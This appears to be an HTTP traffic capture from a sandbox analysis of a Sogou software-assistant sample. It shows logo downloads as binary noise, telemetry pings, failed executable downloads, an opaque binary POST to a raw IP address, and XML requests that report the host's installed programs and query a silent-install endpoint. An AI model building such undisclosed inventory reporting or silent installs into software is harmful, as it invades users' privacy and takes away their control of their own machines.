Content-Length: 22286
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:28:09 GMT
Expires: Thu, 19 May 2016 13:28:09 GMT
Cache-Control: max-age=86400
ETag: 23f52995ff0ca2894451bafb3013b425
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_45_69
X-Yuntu-Trace-Proxy: sjs_86_87
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME..........\..U.IDATx...y.eWY..{.....\[email protected]
.Q[[.U...vh.EP.Vh@@..B...1.2.5Ow.g.{..~..}.=.R.T........{....{..].<
..?...l.z...`....7G..8...n.....f.D.7Z...;t.......d?........8w..1......
l....4....;T.6E'......?......r..,Y.OIq..},92........!.....".y..&`lt<
;\^]z...y..4.rEw)[email protected]..'d..5......#!..(...e.k.
..P)Uj...H.$h.[Wy....{..n1b.X.....#.k..1...AU...(.{....7.;q.P<:..d 
_.>,.?x..."JA}.$D8.d/.#......~.3..o.Uc.t........^f.%.bJq.(..0.A...x
.q....U.9...5......j.......Y...... [email protected]^D..G...oED....M..o....
..q\........L`\.I...^.K.e8..:.k...E..B.E>.....L...{.Sud..k.p......'
.)..E.2.7 .|."...^D...S.UU.3.e?....T.:5...k...i.[..M:..i..........y..s
[email protected]}....K ....0D...e.oJ...e'....#"X.z..u..?t..[.Wuvv....`.{Y
YY...B...g..>...X..z...!...|>...0b..e..3....Y.....K..k..7...M..9
....A..w5U.=...7.....~...b.5 ..,//..v......>.;..l.......g..m..c0.. 
N3.H.x.........DY...9..>..0<N.~`.u.....#.K^V.O../x..3.l/I...yV..
.s}............~.9.....3F0b......1..@. .T..../T.....x........_D..c..~.
s.....M..d........H.......v..W....9w.vvz6............{..|F... 7....`.:
.<...<.K<..e.N.)..~.T.'.K.g......n..O.2....<.V......K..C..
%..;...k.<.=.U...#.....!..k.O....?......O..?...e...#.:U..,K.8..z.e/
......F......a.-T3.D{..NNz?t..>.z%...pT.$-B.{.k. .A`s$..|....X..[..
..R.`..].v4.".c.9.....w.e.7c.3fii...........'ix..rZl..8`3./.!.....
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/5632829225944923461.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 8510
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 13:27:38 GMT
Expires: Thu, 19 May 2016 13:27:38 GMT
Cache-Control: max-age=86400
ETag: e47f9757865c3d4ac672023a3c8188b9
X-YunTu-Cache: HIT
X-Yuntu-Trace: yf_26_53
X-Yuntu-Trace-Proxy: bjzw_40_33
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME......%..p... -IDATx...w.U....k.}....D.J......P.F.`...Q.`G.I&...
...L.Q...c...*:vl..(RTD@)"\............^N...s..>....}.^.o.....I.of.
.K....<............].....5@%..X.....>..W...._.4.x...$.&.W.C..p"p
1p8...{a....x.. 0..!$....3........|<..`.2....&".....0..;.......<
J.A.4&A(.&.w...;[email protected]$P.R.c...>._t...w! ....k.3
...5....4...B............]h...v....i2.8...V.Xd...<.%....H.......3.%
.5.z....#..5.w|....x.q.}...H..?...5.w6..LG..&....y..~H..wJ.,...V....C`
$Z..._..4-.z[C.J..<\....([email protected]\G...u..k.r.7.:..$...........S..o.z
......h-......JA..EncaZ.B.@......!.....}7$..n...`.....~.p6.7K........l
E$.....t~.by..A...A=a.^.~..w.E.r.]....]K.......H.(h..!n.m..z....5..*.R
m.T._o.u.....v.BM...K.J..`.9,..)!.,p>..F.S....]...Sy\....dtw-.^]`D_
.....vS.....*v...V..-.`T..2C...._l...1..hX...r.a[.T...J.............`.
[email protected]..]K`PO.8T1i.........Z.Q.a...q.2..B"....5.?.m...G.P...]E
..\....>.J..j../[email protected]!j..8.C.~.....q........K..a..F ...
..!..%;...9.....djn[...1,!..7.....L...:FL.-...j......b..kCM...."i..m.s
...........Ug.;..>T....3Pq.8......].$...V..............61.._ex.c.sK
..m4..J..l.{.f.W.~3c..../.....o.i.w9L..p.d.Qc........w:.L..w..\....5..
o...fK...%E...J..~3c.H%OAaG|m....}[email protected].${.........!.....F
...h.[.Y.IH...u.......ra~.....bA.....P.|....;.:N....t..V.y....BHfc..&g
t;...j......{..,Yo(..pl........'\G,...0./.8...C...E...hO....T..;F.
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-1433550905860313072.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:23 GMT
Content-Type: image/png
Content-Length: 8018
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 11:44:43 GMT
Expires: Thu, 19 May 2016 11:44:43 GMT
Cache-Control: max-age=86400
ETag: f8328769e4dabe94382be209dee395af
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_124_19
X-Yuntu-Trace-Proxy: tc_196_98
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.....,*.?.....AIDATx...y.]W}.?.....wk.l..%.."..........2,a.....*
.$T..p..PIH.....UI..jB.....$a1........2..d.......w.=......m.%.....I.o.
..=.w.9.w......}C..{1o\;...I..L...S ,5Tz.`....13.....{.....e....v.....
./.p.;7....-E..].?... .Gg......5...W....?..S...5}Q-._deI..P.....9<.
LMM..z..NU/.).Q.^.....!....MWu\....E.~._Aw@D0..*... .0...p.B....... .?
.!..... [...I/._..WpA C....B.o.........Xzgd.........ZXX.\...Q.jp..n...
.$..5.......r..;....s. K......c.....a`..?...^.....CJs..I...._8.o.*..^.
[.z...}>....X4..Rg....CaP..7....>L.............j..y.`k.>..@..
...&0g..A......J..O........N...~.. ..7..d..._2....w:.e*.%dO...T...6.(6
.(J>.)Q..3....LF..........o.&".i;!...\F.......>..?.[...O.....G.#
.3.l..=.a.........3.....#..i;y......4.._.cp".V..'...T..R..A....%......
.s0..O..2./k....8*[email protected]/..n.../".$[S..&kpY.~.r.kV)...;..k.:.[..
...j..5...R|............7..0,.....0. 6.%..K...\S.....u.].....o.Dq...o.
.v...~..s..z .9%.....D.4|...._.)...j.R..v..]........M..DH\J...J.y.E...
`OA%..sp... .T....\F'K..z........!..W`.|,.4.[@*.us.-.au...u...,.;..[..
(......}....X.!.t.`BJseS..PP....J.d.>....[....N.L.^5...jM"`L......g
$.R.71 mS.N.[..X_...g.&.kWi>.2.l..ja...I...Z.L.....-C.#...].#.....j
vO..< ...;A7!Ko....Qn...k....w...E....Y3pvP....[...~.e.]...g......,
...oH...Bl..P....K`Z.>.%B%2T"Cl....T.o.h...{C....1"...{......fc....
K.............9~p..sc1.f.3.A..P...q...k...y(.&.......V.i......cR..
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/6940656908449948330.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 16909
Connection: keep-alive
Last-Modified: Thu, 19 May 2016 06:34:30 GMT
Expires: Fri, 20 May 2016 06:34:30 GMT
Cache-Control: max-age=86400
ETag: caf6c36a823fa1679370b0391f255549
X-YunTu-Cache: HIT
X-Yuntu-Trace: bjzw_16_98
X-Yuntu-Trace-Proxy: tc_192_123
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME.....)[email protected]..}w.dU....sn....qrd...r...l.]1.....a.5..f..
[email protected]@`.&.&.N..r........U].......0....nUW..:.{.t..\.....rP..A
9(.E.......^..cu.S..S}a.g...5............{...e....9U.][email protected]....@..
....tP...............G......d.[.k.......H0........y...../.-.pt..s....@
.A..3./`......d...Z.W....|......&..d..Y..D.......h@h..{z..o....D 6...D
d.....=...kV.b)..x,~y!.i-...P...,...%...........{..E8&.../F...........
qf..o...L.f&.B...-M.........?.:..tC.J....z.*......G.t.54..w._..4.{.=.e
#$@.._}qo..................#N........ 21.f.. .*.`..W.qNhJ%!9........2.
.Ka.."..DcJ 6....{.._s&.y.....Z..7........D....B..N..-..B...0`...;.f V
(....|.q.#Z...H......... ..x?G..?#.Ur..._..$..z<^S.`.`I... ...:..'.
....!....U.......h.q8..$.3t.=8.....d...kc......MiN......[.n...o...L...
..!L.[.......@.~.........#.# U....U./U.D.5......B..y.......N;v....=...
.../)%.kmj..T........D...........3...O.6.[,..L.....7._3...4B.>aD...
.u...Hc$..0.T..,...C........o...\.....5R.s..$Z.....b.......@. 7..J3.DP
..._..Z.{......@{/z\^....h1.......C...^ ..jF*.].xl...v..s/..I.5kf.w.9:
....;..b..9m..7.]#wn...h......`..0A'2..E.r .c...MMs....^....p.Ff*0....
k.!....o.#.Dc.P..b.qL?.....Bh%e...'....q'...hb..{:;...kP.f............
....c......6.=>.3.K.Y.9....o.z.. ....../d....}...._?......z....E..e
....f.../..[.m.mL%...A.r9.|.R....H....D....A$.....W.BO..B.3....C......
...`...m..D.....,.V.D.1b...U.'Z.......W....9..w.R.%.qN.....s.f..q=
<<< skipped >>>

GET /net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4669602030091557924.png&r=null HTTP/1.1


Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cmc.imgstore.cdn.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:24 GMT
Content-Type: image/png
Content-Length: 11255
Connection: keep-alive
Last-Modified: Wed, 18 May 2016 12:47:31 GMT
Expires: Thu, 19 May 2016 12:47:31 GMT
Cache-Control: max-age=86400
ETag: b7f7b4f14c6204c41bda6ec63389622b
X-YunTu-Cache: HIT
X-Yuntu-Trace: sjs_29_26
X-Yuntu-Trace-Proxy: sjs_86_87
.PNG........IHDR..............>a.....gAMA......a.... cHRM..z&......
........u0...`..:....p..Q<....bKGD.......C......pHYs...#...#.x.?v..
..tIME...../.......*.IDATx..]w.U.....{_.o... m..  ....j..%j~j.Xb...5&v
M...F.]cDc.h0...h......,......9.?.{."E..R....-o..33...3g...t....D':..N
t....D':..Nt....D'.sPG7.../.=r....X.... ..Y..1@.&.....L...`bf....#... 
.8.5...R.L......^........~.....1.j..t..............;y..|.........#XH..
.o......D`R&.>s..=.p|.f#~..7.1.{.......N.S...^R._...J..E.S.K.......
.?..........Y%...8Z...2T..G.8..A....@.`.3S....ll...}..P...c,z..~.2...:
.r.\n..v. ...i...AB.*.Z|MG.c.c...s.nCvQ.....j6C..6-...(...$c)f.G.~.z..
.#.#49..m.bR.........Y....t...|.. @$  ....r.`.B.s.ds.../.e......|."...
........O..'.\...~.........y.G.[.`....*.....O.....Lz.8O.. ..Q......Y..
....u..=.A..b[*[email protected]!..L6.. a~f......;~.....A<
..C..8!,/!n..x-...........KD...sKoA...@*.....JJ....d6C0.va..Q3.F.T....
[..)(NAC.`..."r......&..`v......ia..$.m.;...5..y)....K.e/.H.......D.QW
"Q........nA...s.oA.....pR.daRji....M.......m...6.......d.6q..........
0.4.@R...>..Kx..i....c...C....,...!.A...`...]k...n..|.ch...V.G..J..
..j.0L..u....b~. 'Z..*.........Z.....>......3X...I.<.A.<.....
{C...$.Vu.\.#...^*8....ux.....;f......i..^p=..}...;e....*{.n@%..>..
.h..B.H.cp.f..A........I2.K.."[email protected].
..7#....6.j).L.W..H...f....g$9.....D$.a...~.H0C.:-.!.!....\.....U.3..)
y....A..Z...w...........B..p...nZ.......?06....$5......IM..Ovt.[...f.&
lt;.Oa........xUV.&R.9..RJ.....Q\6...np........B........8.(..Q.{J-
<<< skipped >>>


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=1&rand=1463641985 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:00 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=0-
Referer: hXXp://ftp-fj-p2sp.pconline.com.cn/pub/download/201010
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=8755464-8775091
Referer: hXXp://xiazai.sogou.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:44 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5270887-5971727
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:31 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5854764-8782145
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:22 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



POST / HTTP/1.1
Host: 123.129.242.179:80
Content-type: application/octet-stream
Content-Length: 236
Connection: Keep-Alive

5...........A#..h......}..A....E...I./[email protected]./...O.....8;...."a......k.1...w.%..7....."....
...v<J..5H./$......a!k*.|[email protected];..k_.E`.0==1.........x..Z.0..._!. dV.E.XR.Xe....o.....A,.[1...R)lstE.E..l4W.Et...L.....Y
HTTP/1.1 200 OK
Content-Length: 92
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 92..Content-Type: application/octet-s
tream..Connection: Close..5.......P...<..e.VA...|.2uv....#. LE .M.k
....?:...AA.z_..r..U.b3....yt.....9.....u.{...O2[\...



POST /pc_assist/install_check.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 1957
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<?xml version="1.0" encoding="utf-8" ?>
<SoftwareInstallFeaturesRequset>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\Adobe Flash Player ActiveX]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\Microsoft .NET Framework 3.5]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\Microsoft .NET Framework 4 Client Profile]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\SogouSoftware]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\Totalcmd]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\WinPcapInst]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\Wireshark]]>
        </Reg>
    </Item>
    <Item>
        <Reg>
            <![CDATA[$(RegUninstall)\\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}]]&g
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 341
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftwareInstallFeatur
esResponse><Item><Reg><![CDATA[$(RegUninstall)\\Adob
e Flash Player ActiveX]]></Reg><PCID><![CDATA[763893
7123950702413]]></PCID></Item><Item><Reg>&l
t;![CDATA[$(RegUninstall)\\SogouSoftware]]></Reg><PCID>
<![CDATA[-4581287645299687438]]></PCID></Item></S
oftwareInstallFeaturesResponse>.....


POST /pc_assist/local_info.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 294
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<?xml version="1.0" encoding="utf-8" ?>
<SoftwareLocalInfosRequest>
    <Item>
        <PCID>
            <![CDATA[7638937123950702413]]>
        </PCID>
    </Item>
    <Item>
        <PCID>
            <![CDATA[-4581287645299687438]]>
        </PCID>
    </Item>
</SoftwareLocalInfosRequest>

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:03 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 2272
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftwareLocalInfosRes
ponse>.<Item DisplayName="Adobe Flash Player for IE">...<P
CID>....<![CDATA[7638937123950702413]]>...</PCID>...<
;InstallPath>....<FindByPathDirect>.....<![CDATA[C:\Window
s\SysWOW64\Macromed\Flash]]>....</FindByPathDirect>....<Fi
ndByPathDirect>.....<![CDATA[%System%\Macromed\Flash]
]>....</FindByPathDirect>...</InstallPath>...<ExeFil
e>...    <FindByPath>.....<![CDATA[$(InstallPath)\Flash32_
18_0_0_232.ocx]]>....</FindByPath>...</ExeFile>...<V
ersion>....<FindByReg>.....<![CDATA[$(RegUninstall)\Adobe 
Flash Player ActiveX\DisplayVersion]]>....</FindByReg>...<
/Version>...<Icon>....<FindByReg>.....<![CDATA[$(Reg
Uninstall)\Adobe Flash Player ActiveX\DisplayIcon]]>....</FindBy
Reg>...</Icon>...<UninstallString>....<FindByReg>
.....<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\UninstallS
tring]]>....</FindByReg>...</UninstallString>..</Ite
m>.<Item DisplayName="............">...<PCID>....<![
CDATA[-4581287645299687438]]>...</PCID>...<InstallPath>
...    <FindByLink>.....<![CDATA[$(StartMenu)\Programs\......
......\.............lnk]]>....</FindByLink>....<FindByLink
>.....<![CDATA[$(Desktop)\.............lnk]]>....</FindByL
ink>....<FindByReg> .....<![CDATA[HKEY_LOCAL_MACHINE\S
<<< skipped >>>

POST /pc_assist/local_info.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 294
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<?xml version="1.0" encoding="utf-8" ?>
<SoftwareLocalInfosRequest>
    <Item>
        <PCID>
            <![CDATA[7638937123950702413]]>
        </PCID>
    </Item>
    <Item>
        <PCID>
            <![CDATA[-4581287645299687438]]>
        </PCID>
    </Item>
</SoftwareLocalInfosRequest>

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:04 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 2272
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftwareLocalInfosRes
ponse>.<Item DisplayName="Adobe Flash Player for IE">...<P
CID>....<![CDATA[7638937123950702413]]>...</PCID>...<
;InstallPath>....<FindByPathDirect>.....<![CDATA[C:\Window
s\SysWOW64\Macromed\Flash]]>....</FindByPathDirect>....<Fi
ndByPathDirect>.....<![CDATA[%System%\Macromed\Flash]
]>....</FindByPathDirect>...</InstallPath>...<ExeFil
e>...    <FindByPath>.....<![CDATA[$(InstallPath)\Flash32_
18_0_0_232.ocx]]>....</FindByPath>...</ExeFile>...<V
ersion>....<FindByReg>.....<![CDATA[$(RegUninstall)\Adobe 
Flash Player ActiveX\DisplayVersion]]>....</FindByReg>...<
/Version>...<Icon>....<FindByReg>.....<![CDATA[$(Reg
Uninstall)\Adobe Flash Player ActiveX\DisplayIcon]]>....</FindBy
Reg>...</Icon>...<UninstallString>....<FindByReg>
.....<![CDATA[$(RegUninstall)\Adobe Flash Player ActiveX\UninstallS
tring]]>....</FindByReg>...</UninstallString>..</Ite
m>.<Item DisplayName="............">...<PCID>....<![
CDATA[-4581287645299687438]]>...</PCID>...<InstallPath>
...    <FindByLink>.....<![CDATA[$(StartMenu)\Programs\......
......\.............lnk]]>....</FindByLink>....<FindByLink
>.....<![CDATA[$(Desktop)\.............lnk]]>....</FindByL
ink>....<FindByReg> .....<![CDATA[HKEY_LOCAL_MACHINE\S
<<< skipped >>>

POST /pc_assist/newversion_info.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 429
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<SoftwareNewVersionInfosRequest>
    <Item>
        <PCID>
            <![CDATA[7638937123950702413]]>
        </PCID>
        <LocalVersion>
            <![CDATA[11.6.602.168]]>
        </LocalVersion>
    </Item>
    <Item>
        <PCID>
            <![CDATA[-4581287645299687438]]>
        </PCID>
        <LocalVersion>
            <![CDATA[3.1.13.79]]>
        </LocalVersion>
    </Item>
</SoftwareNewVersionInfosRequest>

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 1380
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftwareNewVersionInf
os>.<Item>...<soft_id><![CDATA[7638937123950702413]]
></soft_id>....<name><![CDATA[Adobe Flash Player for
 IE]]></name>....<logo_url><![CDATA[hXXp://pc3.gtimg
.com/softmgr/logo/48/504_48_1433919181.png]]></logo_url>....&
lt;installfile_size><![CDATA[19398656]]></installfile_size
>....<download_url1><![CDATA[hXXp://c.softmgr.qq.com/fcgi-
bin/partnerdown?soft_id=504&partner=108&dl=http://dl.softmgr.qq.
com/original/Video/install_flash_player_21_active_x_ie_21.0.0.21
3.exe]]></download_url1>....<app_updatetime><![CDATA
[2016-04-07]]></app_updatetime>....<details><![CDATA
[.....................................................................
......................................................................
.....]]></details>....<version><![CDATA[21.0.0.213]]
></version>....<is_stable><![CDATA[1]]></is_st
able>....<whatsnew><![CDATA[1.............................
.........................................Flash Player ActiveX...NPAPI.
..PPAPI............................2..................................
.........Chrome.................................MAC...................
.........3..........Stage3D......VideoTexture.........MAC...PC........
...........4.........................]]></whatsnew>....<up
grade_rate><![CDATA[81]]></upgrade_rate>....<sco
<<< skipped >>>

POST /pc_assist/silent_install.php HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 254
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<SoftwareSilentParaRequest>
    <Item>
        <PCID>
            <![CDATA[7638937123950702413]]>
        </PCID>
    </Item>
    <Item>
        <PCID>
            <![CDATA[-4581287645299687438]]>
        </PCID>
    </Item>
</SoftwareSilentParaRequest>

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 97
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftwareSilentParaReq
uest>..</SoftwareSilentParaRequest>.....


POST /pc_assist/soft_info.php?fields=logo_url HTTP/1.1


Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 254
User-Agent: HttpRequest
Host: zs.xiazai.sogou.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F

<SoftwareOnlineIconRequest>
    <Item>
        <PCID>
            <![CDATA[7638937123950702413]]>
        </PCID>
    </Item>
    <Item>
        <PCID>
            <![CDATA[-4581287645299687438]]>
        </PCID>
    </Item>
</SoftwareOnlineIconRequest>

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:05 GMT
Content-Type: text/html; charset=gb2312
Content-Length: 359
Connection: keep-alive
X-Powered-By: PHP/5.3.3
<?xml version="1.0" encoding="utf-8"?>.<SoftInfoResponse>&
lt;Item><soft_id><![CDATA[7638937123950702413]]></so
